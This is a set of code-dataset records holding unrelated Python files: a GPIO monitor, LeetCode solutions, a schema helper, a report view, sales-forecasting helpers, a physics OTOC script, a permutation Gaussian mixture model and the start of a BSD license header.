Domain\n\nhttp://abyz.me.uk/lg/py_lgpio.html\n\n./monitor.py [chip:]gpio ...\n\nchip specifies a gpiochip number. gpio is a GPIO in the previous\ngpiochip (gpiochip0 if there is no previous gpiochip).\n\ne.g.\n\n./monitor.py 23 24 25 # monitor gpiochip0: 23,24,25\n./monitor.py 0:23 24 1:0 5 6 # monitor gpiochip0: 23,24 gpiochip1: 0,5,6\n\"\"\"\n\nimport sys\nimport time\nimport lgpio as sbc\n\ndef cbf(chip, gpio, level, tick):\n print(\"chip={} gpio={} level={} time={:.09f}\".format(\n chip, gpio, level, tick / 1e9))\n\nhandle = -1\nchip = 0\ngpio = 0\n\nargc = len(sys.argv)\n\nsbc.exceptions = False\n\nfor i in range(1, argc):\n\n p = sys.argv[i].split(':')\n\n if len(p) == 2:\n\n # chip:gpio option\n\n c = int(p[0])\n g = int(p[1])\n\n print(\"chip={} gpio={}\".format(c, g))\n\n if c != chip:\n handle = -1; # force open of new gpiochip\n\n chip = c\n gpio = g\n\n elif len(p) == 1:\n\n # gpio option\n\n g = int(p[0])\n\n print(\"chip={} gpio={}\".format(chip, g))\n\n # chip the same as previous\n gpio = g\n\n else:\n\n # bad option\n\n print(\"don't understand {}\".format(sys.argv[i]))\n exit()\n\n if gpio >= 0:\n\n if handle < 0:\n\n # get a handle to the gpiochip\n handle = sbc.gpiochip_open(chip)\n\n if handle >= 0:\n\n # got a handle, now open the GPIO for alerts\n err = sbc.gpio_claim_alert(handle, gpio, sbc.BOTH_EDGES)\n\n if err < 0:\n\n print(\"GPIO in use {}:{} ({})\".format(\n chip, gpio, sbc.error_text(err)))\n exit()\n\n cb_id = sbc.callback(handle, gpio, sbc.BOTH_EDGES, cbf)\n\n else:\n\n print(\"can't open gpiochip {} ({})\".format(\n chip, sbc.error_text(handle)))\n exit()\n\n else:\n\n print(\"don't understand {}\".format(sys.argv[i]))\n exit()\n\nsbc.exceptions = True\n\nwhile True:\n time.sleep(1)\n\n","sub_path":"EXAMPLES/py_lgpio/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"193845575","text":"'''\nGiven a binary tree, return the bottom-up level order traversal of its nodes'\nvalues. (ie, from left to right, level by level from leaf to root).\n\nFor example:\nGiven binary tree [3,9,20,null,null,15,7],\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its bottom-up level order traversal as:\n[\n [15,7],\n [9,20],\n [3]\n]\n'''\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom typing import Optional, List\nfrom lib import TreeNode, list_to_tree\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n res = []\n if root: \n level = [root]\n while level: \n res.append([node.val for node in level])\n level =[leaf for node in level for leaf in (node.left, node.right) if leaf]\n return res[::-1]\n \n\n# test\nroot = list_to_tree([3,9,20,None,None,15,7])\nprint(Solution().levelOrderBottom(root))\n","sub_path":"leetcode/LC107. Binary Tree Level Order Traversal II.py","file_name":"LC107. Binary Tree Level Order Traversal II.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"475674904","text":"# coding=utf-8\nfrom typing import Any, Optional, Mapping\n\nfrom bson import ObjectId\nfrom marshmallow import Schema, pre_load, fields\n\n\n__all__ = ['ObjectIdField', 'StripEmptySchema']\n\n\nclass ObjectIdField(fields.Field):\n def _serialize(self, value: ObjectId, attr: str, obj: Any, **kwargs):\n return str(value)\n\n def _deserialize(self, value: str, attr: Optional[str],\n data: Optional[Mapping[str, Any]], **kwargs):\n return ObjectId(value)\n\n\nclass StripEmptySchema(Schema):\n @pre_load\n def _strip_off(self, data, **kwargs):\n stripped_keys = []\n for k, v in data.items():\n if v is None:\n stripped_keys.append(k)\n elif isinstance(v, str) and v.strip() == '':\n stripped_keys.append(k)\n elif isinstance(v, (list, tuple, dict, set)) and len(v) == 0:\n stripped_keys.append(k)\n for k in stripped_keys:\n del data[k]\n return data\n","sub_path":"celery_workers/base_schema.py","file_name":"base_schema.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"300932614","text":"import services.controlers.reportsControler\nimport json\nfrom json import JSONEncoder\nfrom json import JSONDecoder\nfrom services.exceptions import *\n\nclass WarehousesReportView:\n\tdef get (self):\n\t\tresponse_data = {}\n\t\terror = ErrorNoAdmitePeticionesGet()\n\t\tresponse_data['status']=error.code\n\t\tresponse_data['message']=error.message\n\t\tresponse_data['data']=''\n\t\tjsonStringResponse = JSONEncoder().encode(response_data)\n\t\treturn jsonStringResponse\n\tdef post(self, fromDate, toDate):\n\t\tresponse_data = {}\n\t\t#se cambia el formato de fecha al datetame de datastore#\n\t\tjsonFromDate = json.loads(fromDate)\n\t\tfromDate = str('')+str(jsonFromDate['year'])+str('-')+str(jsonFromDate['month'])+str('-')+str(jsonFromDate['day'])+str(' ')+str('00:00:00.000000')\n\t\tjsonToDate = json.loads(toDate)\n\t\ttoDate = str('')+str(jsonToDate['year'])+str('-')+str(jsonToDate['month'])+str('-')+str(jsonToDate['day'])+str(' ')+str('23:59:59.999999')\n\t\ttry:\n\t\t\treportsControler =services.controlers.reportsControler.ReportsControler()\n\t\t\tdata = reportsControler.getWarehousesReport(fromDate, toDate)\n\t\t\tresponse_data['status']=OK\n\t\t\tresponse_data['message']='Reporte_Enviado'\n\t\t\tresponse_data['data'] = data\n\t\texcept ExceptionWithCode as e:\n\t\t\tresponse_data['status']=e.code\n\t\t\tresponse_data['message']=e.message\n\t\t\tresponse_data['data']=''\n\n\t\texcept Exception as e:\n\t\t\tresponse_data['status']=ERROR_NO_DEFINIDO\n\t\t\tresponse_data['message']=e.message\n\t\t\tresponse_data['data']=''\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Critical', ERROR_NO_DEFINIDO, e.message)\n\n\t\tjsonStringResponse = JSONEncoder().encode(response_data)\n\t\treturn jsonStringResponse","sub_path":"services/views/warehousesReportView.py","file_name":"warehousesReportView.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"334935552","text":"from EDA import merging, reorder_columns, convert_dates_to_months, group_into_monthly_sales\nimport pandas as pd\nimport numpy as np\nimport statsmodels.formula.api as smf\nfrom sklearn.preprocessing import MinMaxScaler\n\n\"\"\"this module hosts functions that help to analyze the contributions by shop to the total sales\"\"\"\n\n\ndef group_by_shop(sales_m: pd.DataFrame) -> pd.DataFrame:\n sales_m_agg = sales_m.groupby(['date', 'date_block_num', 'shop_id']).item_cnt_month.sum().reset_index()\n agg_sales = sales_m_agg.groupby('date_block_num').item_cnt_month.sum().reset_index()\n date_agg = dict(zip(agg_sales.date_block_num, agg_sales.item_cnt_month))\n sales_m_agg['agg'] = sales_m_agg.date_block_num.map(date_agg)\n sales_m_agg['shop_contrib'] = sales_m_agg['item_cnt_month'] / sales_m_agg['agg']\n\n return sales_m_agg\n\n\ndef test_contrib(sales_m_agg: pd.DataFrame):\n for num in sales_m_agg.date_block_num.unique():\n assert sales_m_agg[sales_m_agg.date_block_num == 0]['shop_contrib'].sum() == 1.0\n\n\ndef build_featureset(df_diff: pd.DataFrame, look_back: int) -> pd.DataFrame:\n # create dataframe for transformation from time series to supervised\n X = df_diff.copy()\n df_supervised = X.drop(['prev_sales'], axis=1)\n for i in range(1, look_back + 1):\n fieldname = 'lag_' + str(i)\n df_supervised[fieldname] = df_supervised['diff'].shift(i)\n # drop Nan\n df_supervised = df_supervised.dropna(axis=0, inplace=False).reset_index(drop=True)\n\n return df_supervised\n\n\ndef scale_features(df_supervised: pd.DataFrame) -> (sklearn.preprocessing.MinMaxScaler, np.array):\n df_model = df_supervised.drop(['sales', 'date'], axis=1)\n scaler = MinMaxScaler(feature_range=(-1, 1))\n scaler.fit(df_model.values)\n train_set_scaled = scaler.transform(df_model.values)\n\n return scaler, train_set_scaled\n\n\ndef adjusted_r_sqrt(df_supervised: pd.DataFrame, target: str, features: list):\n streak = features[0]\n for feature in features[1:]:\n streak += ' + ' + feature\n model = smf.ols(formula=target + ' ~ ' + str(streak), data=df_supervised)\n model_fit = model.fit()\n regression_adj_rsq = model_fit.rsquared_adj\n print(regression_adj_rsq)\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"133659785","text":"\"\"\"\nStone Game\nAlex and Lee play a game with piles of stones. There are an even number of piles arranged in a row, and each pile has a positive integer number of stones piles[i].\n\nThe objective of the game is to end with the most stones. The total number of stones is odd, so there are no ties.\n\nAlex and Lee take turns, with Alex starting first. Each turn, a player takes the entire pile of stones from either the beginning or the end of the row. This continues until there are no more piles left, at which point the person with the most stones wins.\n\nAssuming Alex and Lee play optimally, return True if and only if Alex wins the game.\n\n\n\nExample 1:\n\nInput: piles = [5,3,4,5]\nOutput: true\nExplanation:\nAlex starts first, and can only take the first 5 or the last 5.\nSay he takes the first 5, so that the row becomes [3, 4, 5].\nIf Lee takes 3, then the board is [4, 5], and Alex takes 5 to win with 10 points.\nIf Lee takes the last 5, then the board is [3, 4], and Alex takes 4 to win with 9 points.\nThis demonstrated that taking the first 5 was a winning move for Alex, so we return true.\n\n\nConstraints:\n\n2 <= piles.length <= 500\npiles.length is even.\n1 <= piles[i] <= 500\nsum(piles) is odd.\n\"\"\"\nfrom functools import lru_cache\nfrom typing import List\n\n\nclass Solution:\n def stoneGame(self, piles: List[int]) -> bool:\n # Solution 1 - 524 ms\n \"\"\"\n @lru_cache(None)\n def dp(left, right):\n if left > right: return (0, 0)\n\n pickLeft = dp(left + 1, right)\n pickRight = dp(left, right - 1)\n\n if piles[left] + pickLeft[1] > piles[right] + pickRight[\n 1]: # If the left choice has higher score than the right choice\n return piles[left] + pickLeft[1], pickLeft[0] # then pick left\n\n return piles[right] + pickRight[1], pickRight[0] # else pick right\n\n alexScore, leeScore = dp(0, len(piles) - 1)\n return alexScore > leeScore\n \"\"\"\n # Solution 2 - 52 ms\n memo = {}\n\n def helper(alex, lee, start, end):\n if start > end:\n return alex > lee\n if (start, end) in memo:\n return memo[(start, end)]\n ret = (helper(alex + piles[start], lee + piles[end], start + 1, end - 1) or\n helper(alex + piles[start], lee + piles[start + 1], start + 2, end) or\n helper(alex + piles[end], lee + piles[start], start + 1, end - 1) or\n helper(alex + piles[end], lee + piles[end - 1], start, end - 2))\n memo[(start, end)] = ret\n return ret\n\n return helper(0, 0, 0, len(piles) - 1)\n\n\n# Main Call\npiles = [5, 3, 4, 5]\nsolution = Solution()\nprint(solution.stoneGame(piles))\n","sub_path":"src/arrays/stoneGame.py","file_name":"stoneGame.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652583580","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 16:34:01 2020\n\n@author: vgs23\n\"\"\"\n\nimport numpy as np\n\nglobal vals,vecs,x_arr,dx,dy,basis_N,n_eigen\n\ndef pos_matrix_elts(n,k):\n global vals,vecs,x_arr,dx,dy,basis_N\n return np.sum(vecs[:,n]*vecs[:,k]*x_arr*dx*dy)\n #return np.sum(vecs[:,n]*vecs[:,k]*x*dx)#np.sum(temp1*temp2*x*dx)#\n \nx_matrix = np.vectorize(pos_matrix_elts)\n\n#pos_mat_elt = 0.0\n#n_arr = np.arange(5)\nk_arr = np.arange(basis_N)\n#pos_mat = np.zeros_like(k_arr)\n#cProfile.run('OTOC_f.position_matrix.compute_pos_mat_arr_k(vecs,x_arr,dx,dy,n,k_arr,pos_mat)')\n#cProfile.run('x_matrix(n,k_arr)')\n#print('Normalised?', np.sum(vecs[:,2]*vecs[:,2]*dx))\n#print('Norm:', np.sum(vecs[:,2]*vecs[:,2]*dx*dy))\n#tarr = np.arange(0,50,1e-1)\n\ndef b_matrix(n,m,t):\n karr = np.arange(0,basis_N)\n E_km = vals[karr] - vals[m]\n E_nk = vals[n] - vals[karr]\n x_nk= x_matrix(n,karr)\n x_km = x_matrix(karr,m)\n return 0.5*np.sum(x_nk*x_km*(E_km*np.exp(1j*E_nk*t) - E_nk*np.exp(1j*E_km*t)))\n\nb_matrix = np.vectorize(b_matrix)\n#cProfile.run('OTOC_f.position_matrix.b_matrix_elts(vecs,x_arr,dx,dy,k_arr,vals,2,2,1.0,b_mat_elt)')\n#cProfile.run('b_matrix(2,2,1.0)')\n\nm_arr = np.arange(0,basis_N)\nb_mat = np.zeros_like(m_arr)\n#cProfile.run('OTOC_f.position_matrix.compute_b_mat_arr_m(vecs,x_arr,dx,dy,k_arr,vals,2,m_arr,1.0,b_mat)')\n#cProfile.run('b_matrix(2,m_arr,1.0)')\n\ndef c_mc(n,t):\n marr = np.arange(0,basis_N)\n b_nm = b_matrix(n,marr,t)\n return np.sum(b_nm*np.conj(b_nm))\n\nc_mc = np.vectorize(c_mc)\n\n#t_arr = np.arange(0,5,0.1)\n#c_mc_elt = np.zeros_like(t_arr)\n#c_mc_elt = OTOC_f.position_matrix.compute_c_mc_arr_n(vecs,x_arr,dx,dy,k_arr,vals,np.arange(10),m_arr,3.0,c_mc_elt)\n#c_mc_elt = OTOC_f.position_matrix.compute_c_mc_arr_t(vecs,x_arr,dx,dy,k_arr,vals,1,m_arr,t_arr,c_mc_elt)\n \n#plt.plot(t_arr,c_mc_elt)\n#plt.show()\n\ndef OTOC(t,beta):\n global vals,n_eigen\n val = vals[:n_eigen]\n Z = np.sum(np.exp(-beta*val))\n n_arr = np.arange(0,len(val))\n return (1/Z)*np.sum(np.exp(-beta*val)*c_mc(n_arr,t) )\n\nOTOC = np.vectorize(OTOC)\n\n#cProfile.run('OTOC_f.position_matrix.compute_otoc_arr_t(vecs,x_arr,dx,dy,k_arr,vals,m_arr,t_arr,0.001,n_eigen,OTOC_mat)')\n#cProfile.run('OTOC(t_arr,0.001)')","sub_path":"Python_files/OTOC/OTOC.py","file_name":"OTOC.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"559442365","text":"import numpy as np\nimport itertools as itr\nimport amitgroup as ag\nfrom scipy.misc import logsumexp\nfrom sklearn.base import BaseEstimator\nimport time\n\n_COV_TYPES = ['ones', 'tied', 'diag', 'diag-perm',\n 'full', 'full-perm', 'full-full']\n\n\nclass PermutationGMM(BaseEstimator):\n \"\"\"\n\n \"\"\"\n def __init__(self, n_components=1, permutations=1, covariance_type='tied',\n min_covar=1e-3, n_iter=20, n_init=1, params='wmc',\n random_state=0, thresh=1e-2, covar_limit=None, target_entropy=None):\n\n assert covariance_type in _COV_TYPES, \"Covariance type not supported\"\n if not isinstance(random_state, np.random.RandomState):\n random_state = np.random.RandomState(random_state)\n\n self._covtype = covariance_type\n self.random_state = random_state\n self.n_components = n_components\n\n if isinstance(permutations, int):\n # Cycle through them\n P = permutations\n self.permutations = np.zeros((P, P), dtype=np.int64)\n for p1, p2 in itr.product(range(P), range(P)):\n self.permutations[p1, p2] = (p1 + p2) % P\n else:\n self.permutations = np.asarray(permutations)\n\n self.n_iter = n_iter\n self.n_init = n_init\n self.thresh = thresh\n self.min_covar = min_covar\n self._covar_limit = covar_limit\n self._params = params\n self._target_entropy = target_entropy\n\n self.weights_ = None\n self.means_ = None\n self.covars_ = None\n\n def score_block_samples(self, X):\n \"\"\"\n Score complete samples according to the full model. This means that\n each sample has all its blocks with the different transformations for\n each permutation.\n\n Parameters\n ----------\n X : ndarray\n Array of samples. Must have shape `(N, P, D)`, where `N` are number\n of samples, `P` number of permutations and `D` number of dimensions\n (flattened if multi-dimensional).\n\n Returns\n -------\n logprob : array_like, shape (n_samples,)\n Log probabilities of each full data point in X.\n log_responsibilities : array_like,\n shape (n_samples, n_components, n_permutations)\n Log posterior probabilities of each mixture component and\n permutation for each observation.\n\n \"\"\"\n from scipy.stats import multivariate_normal\n N = X.shape[0]\n K = self.n_components\n P = len(self.permutations)\n\n unorm_log_resp = np.empty((N, K, P))\n unorm_log_resp[:] = np.log(self.weights_[np.newaxis])\n\n for p in range(P):\n for shift in range(P):\n p0 = self.permutations[shift, p]\n for k in range(K):\n if self._covtype == 'ones':\n cov = np.diag(self.covars_)\n elif self._covtype == 'tied':\n cov = self.covars_\n elif self._covtype == 'diag-perm':\n cov = np.diag(self.covars_[p])\n elif self._covtype == 'diag':\n cov = np.diag(self.covars_[k, p])\n elif self._covtype == 'full':\n cov = self.covars_[k]\n elif self._covtype == 'full-perm':\n cov = self.covars_[p]\n elif self._covtype == 'full-full':\n cov = self.covars_[k, p]\n\n unorm_log_resp[:, k, p] += multivariate_normal.logpdf(\n X[:, p0],\n mean=self.means_[k, shift],\n cov=cov)\n\n unorm_reshaped = unorm_log_resp.reshape((unorm_log_resp.shape[0], -1))\n logprob = logsumexp(unorm_reshaped.clip(min=-500), axis=-1)\n log_resp = unorm_log_resp - logprob[..., np.newaxis, np.newaxis]\n log_resp = log_resp.clip(min=-500)\n\n return logprob, log_resp\n\n def fit(self, X):\n \"\"\"\n Estimate model parameters with the expectation-maximization algorithm.\n\n Parameters are set when constructing the estimator class.\n\n Parameters\n ----------\n X : array_like, shape (n, n_permutations, n_features)\n Array of samples, where each sample has been transformed\n `n_permutations` times.\n\n \"\"\"\n def diff_entropy(cov):\n sign, logdet = np.linalg.slogdet(cov)\n return 0.5 * cov.shape[0] * np.log(2 * np.pi * np.e) + logdet\n\n def reg_covar(cov0, mcov, target_entropy):\n def regularize_cov(reg_val):\n return cov0 * (1 - reg_val) + np.eye(cov0.shape[0]) * reg_val\n\n lo, hi = self.min_covar * (1 + np.array([-0.95, 2.95]))\n ent = None\n for d in range(15):\n mi = np.mean([lo, hi])\n\n c = regularize_cov(mi)\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov1 = np.mean([lo, hi])\n print('mcov multiple', mcov1 / mcov)\n return regularize_cov(mcov1)\n\n\n assert X.ndim == 3\n N, P, F = X.shape\n\n assert P == len(self.permutations)\n K = self.n_components\n\n if K == 1 and P == 1 and self._covtype == 'diag':\n self.weights_ = np.ones(1)\n self.means_ = ag.apply_once(np.mean, X, [0])\n c0 = ag.apply_once(np.var, X, [0])\n self.covars_ = c0 + self.min_covar\n self.converged_ = True\n def diff_entropy(cov):\n return 0.5 * cov.shape[2] * np.log(2 * np.pi * np.e) + np.sum(np.log(np.fabs(cov)))\n\n if self._target_entropy is None:\n c = c0 + self.min_covar\n ent = diff_entropy(c)\n self._target_entropy = ent\n self.covars_ = c\n self._entropy = ent\n else:\n lo, hi = self.min_covar * (1 + np.array([-0.25, 0.25]))\n self._entropy = diff_entropy(self.covars_)\n for d in range(10):\n mi = np.mean([lo, hi])\n\n c = c0 + mi\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > self._target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov = np.mean([lo, hi])\n print('mcov', mcov)\n\n print('target_entropy', self._target_entropy)\n print('diff', np.fabs(ent - self._target_entropy))\n\n self.covars_ = c0 + mcov\n self._entropy = diff_entropy(self.covars_)\n return\n if K == 1 and P == 1 and self._covtype == 'tied':\n cov0 = np.cov(X[:,0].T)\n\n U, S, V = np.linalg.svd(cov0)\n def regularize_cov(reg_val):\n #return cov0 + np.eye(cov.shape[0]) * reg_val\n return cov0 * (1 - reg_val) + np.eye(cov0.shape[0]) * reg_val\n #regS = S.clip(min=reg_val)\n #regS = (S + 0.0001) * (reg_val / self.min_covar)\n #return np.dot(np.dot(U, np.diag(regS)), V)\n\n self.weights_ = np.ones(1)\n self.means_ = ag.apply_once(np.mean, X, [0])\n self.converged_ = True\n if self._target_entropy is None:\n c = regularize_cov(self.min_covar)\n ent = diff_entropy(c)\n self.covars_ = c\n self._entropy = ent\n else:\n lo, hi = self.min_covar * (1 + np.array([-0.95, 1.95]))\n ent = None\n for d in range(15):\n mi = np.mean([lo, hi])\n\n c = regularize_cov(mi)\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > self._target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov = np.mean([lo, hi])\n print('mcov', mcov)\n\n print('target_entropy', self._target_entropy)\n print('diff', np.fabs(ent - self._target_entropy))\n\n self.covars_ = regularize_cov(mcov) #np.cov(X[:,0].T) + np.diag(np.ones(F)*mcov)\n\n #print('diff entropy', diff_entropy(self.covars_))\n\n self._entropy = diff_entropy(self.covars_)\n return\n\n #N34 = 3 * N // 4\n #HX = X[N34:]\n #X = X[:N34]\n\n #HN = N - N34\n #N = N34\n print('HERE')\n\n XX = X.reshape((-1, X.shape[-1]))\n\n max_log_prob = -np.inf\n\n for trial in range(self.n_init):\n loglikelihoods = []\n self.weights_ = np.ones((K, P)) / (K * P)\n\n flatX = X.reshape((-1, F))\n\n # Initialize to covariance matrix of all samples\n if self._covtype == 'diag':\n pass\n elif 0:\n cv = np.eye(F)\n elif 1:\n print('cov')\n cv = (1 - self.min_covar) * np.cov(flatX.T) + self.min_covar * np.eye(F)\n print('cov done')\n else:\n cv = ag.io.load('/var/tmp/cov.h5')\n\n # Initialize by picking K components at random.\n if self._covtype == 'diag':\n repr_samples = X[self.random_state.choice(N, K, replace=False)]\n self.means_ = repr_samples\n elif 0:\n # Initialize by running kmeans\n assert P == 1\n from sklearn.cluster import KMeans\n clf = KMeans(n_clusters=K)\n XX2 = np.dot(cv, flatX.T).T\n\n clf.fit(XX2)\n\n means = clf.means_\n\n self.means_ = clf.means_.reshape((K,) + X.shape[1:])\n else:\n # TODO: Does not initialize permutations in a coherent way, but\n # this might not be needed anyway\n rs = np.random.RandomState(trial) # TODO: Insert seed\n mm = rs.multivariate_normal(np.zeros(F), cv, size=K * P)\n self.means_ = mm.reshape((K,) + X.shape[1:])\n\n if self._covtype == 'ones':\n self.covars_ = np.ones(cv.shape[0])\n elif self._covtype == 'tied':\n self.covars_ = cv\n elif self._covtype == 'diag':\n self.covars_ = np.tile(np.ones(F), (K, P, 1))\n elif self._covtype == 'diag-perm':\n self.covars_ = np.tile(np.diag(cv).copy(), (P, 1))\n elif self._covtype == 'full':\n self.covars_ = np.tile(cv, (K, 1, 1))\n elif self._covtype == 'full-perm':\n self.covars_ = np.tile(cv, (P, 1, 1))\n elif self._covtype == 'full-full':\n self.covars_ = np.tile(cv, (K, P, 1, 1))\n\n self.converged_ = False\n for loop in range(self.n_iter):\n start = time.clock()\n\n # E-step\n logprob, log_resp = self.score_block_samples(X)\n\n #test_logprob, _ = self.score_block_samples(HX)\n #test_loglikelihood = test_logprob.sum()\n\n # TODO\n hh = np.histogram(np.exp(log_resp.max(-1).max(-1)),\n bins=np.linspace(0, 1, 11))\n\n sh = (-1, log_resp.shape[1])\n resp = np.exp(log_resp)\n lresp = log_resp.transpose((0, 2, 1)).reshape(sh)\n log_dens = logsumexp(lresp, axis=0)[np.newaxis, :, np.newaxis]\n dens = np.exp(log_dens)\n\n # M-step\n\n if 'm' in self._params:\n for p in range(P):\n v = 0.0\n for shift in range(P):\n p0 = self.permutations[shift, p]\n v += np.dot(resp[:, :, shift].T, X[:, p0])\n\n self.means_[:, p, :] = v\n self.means_ /= dens.ravel()[:, np.newaxis, np.newaxis]\n\n if 'w' in self._params:\n ww = (ag.apply_once(np.sum, resp, [0], keepdims=False) / N)\n self.weights_[:] = ww.clip(0.0001, 1 - 0.0001)\n\n if 'c' in self._params:\n if self._covtype == 'ones':\n # Do not update\n pass\n elif self._covtype == 'tied':\n from pnet.cyfuncs import calc_new_covar\n self.covars_[:] = calc_new_covar(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n # Now make sure the diagonal is not overfit\n dd = np.diag(self.covars_)\n D = self.covars_.shape[0]\n self.covars_ = (self.covars_ * (1 - self.min_covar) +\n np.eye(D) * self.min_covar)\n\n elif self._covtype == 'diag':\n from pnet.cyfuncs import calc_new_covar_diag as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n self.covars_[:] += self.min_covar\n\n elif self._covtype == 'diag-perm':\n from pnet.cyfuncs import calc_new_covar_diagperm as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n self.covars_[:] = self.covars_.clip(min=self.min_covar)\n\n elif self._covtype == 'full':\n from pnet.cyfuncs import calc_new_covar_full as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n for k in range(K):\n #dd = np.diag(self.covars_[k])\n #clipped_dd = dd.clip(min=self.min_covar)\n #self.covars_[k] += np.diag(clipped_dd - dd)\n\n self.covars_[k] = reg_covar(self.covars_[k],\n self.min_covar,\n -9000.0)\n\n #c = self.covars_[k]\n #c = (1 - mcov) * c + mcov * np.eye(c.shape[0])\n #self.covars_[k] = c\n\n elif self._covtype == 'full-perm':\n from pnet.cyfuncs import calc_new_covar_fullperm as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n for p in range(P):\n dd = np.diag(self.covars_[p])\n clipped_dd = dd.clip(min=self.min_covar)\n self.covars_[p] += np.diag(clipped_dd - dd)\n\n elif self._covtype == 'full-full':\n from pnet.cyfuncs import calc_new_covar_fullfull as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n D = self.covars_.shape[2]\n for k, p in itr.product(range(K), range(P)):\n dd = np.diag(self.covars_[k, p])\n clipped_dd = dd.clip(min=self.min_covar)\n #self.covars_[k, p] += np.diag(clipped_dd - dd)\n #self.covars_[k, p] += np.diag(clipped_dd - dd)\n self.covars_[k, p] += np.eye(D) * self.min_covar\n\n # Calculate log likelihood\n loglikelihoods.append(logprob.sum())\n\n ag.info(\"Trial {trial}/{n_trials} Iteration {iter} \"\n \"Time {time:.2f}s Log-likelihood {llh:.2f} \"\n #\"Test log-likelihood {tllh:.2f}\"\n \"\".format(\n trial=trial+1,\n n_trials=self.n_init,\n iter=loop+1,\n time=time.clock() - start,\n llh=loglikelihoods[-1] / N,\n #tllh=test_loglikelihood / HN,\n ))\n\n if loop > 0:\n absdiff = abs(loglikelihoods[-1] - loglikelihoods[-2])\n if absdiff/abs(loglikelihoods[-2]) < self.thresh:\n self.converged_ = True\n break\n\n if loglikelihoods[-1] > max_log_prob:\n ag.info(\"Updated best log likelihood to {}\"\n .format(loglikelihoods[-1]))\n max_log_prob = loglikelihoods[-1]\n best_params = {'weights': self.weights_,\n 'means': self.means_,\n 'covars': self.covars_,\n 'converged': self.converged_}\n else:\n ag.info(\"Did not updated best\")\n\n self.weights_ = best_params['weights']\n self.means_ = best_params['means']\n self.covars_ = best_params['covars']\n self.converged_ = best_params['converged']\n\n def predict_flat(self, X):\n \"\"\"\n Returns an array of which mixture component each data entry is\n associate with the most. This is similar to `predict`, except it\n collapses component and permutation to a single index.\n\n Parameters\n ----------\n X : ndarray\n Data array to predict.\n\n Returns\n -------\n components: list\n An array of length `num_data` where `components[i]` indicates the\n argmax of the posteriors. The permutation EM gives two indices, but\n they have been flattened according to ``index * component +\n permutation``.\n \"\"\"\n if self.means_.shape[0] == 1:\n return np.zeros(X.shape[0], dtype=np.int64)\n else:\n logprob, log_resp = self.score_block_samples(X)\n ii = log_resp.reshape((log_resp.shape[0], -1)).argmax(-1)\n return ii\n\n def predict(self, X):\n \"\"\"\n Returns a 2D array of which mixture component each data entry is\n associate with the most.\n\n Parameters\n ----------\n X : ndarray\n Data array to predict.\n\n Returns\n -------\n components: list\n An array of shape `(num_data, 2)` where `components[i]` indicates\n the argmax of the posteriors. For each sample, we have two values,\n the first is the part and the second is the permutation.\n \"\"\"\n ii = self.predict_flat(X)\n sh = (self.n_components, len(self.permutations))\n return np.vstack(np.unravel_index(ii, sh)).T\n","sub_path":"pnet/permutation_gmm.py","file_name":"permutation_gmm.py","file_ext":"py","file_size_in_byte":19938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561027490","text":"#!/usr/bin/env python\n\n# Copyright (c) 2016 Thomas Nicholson \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. The names of the author(s) may not be used to endorse or promote\n# products derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHORS ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED\n# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 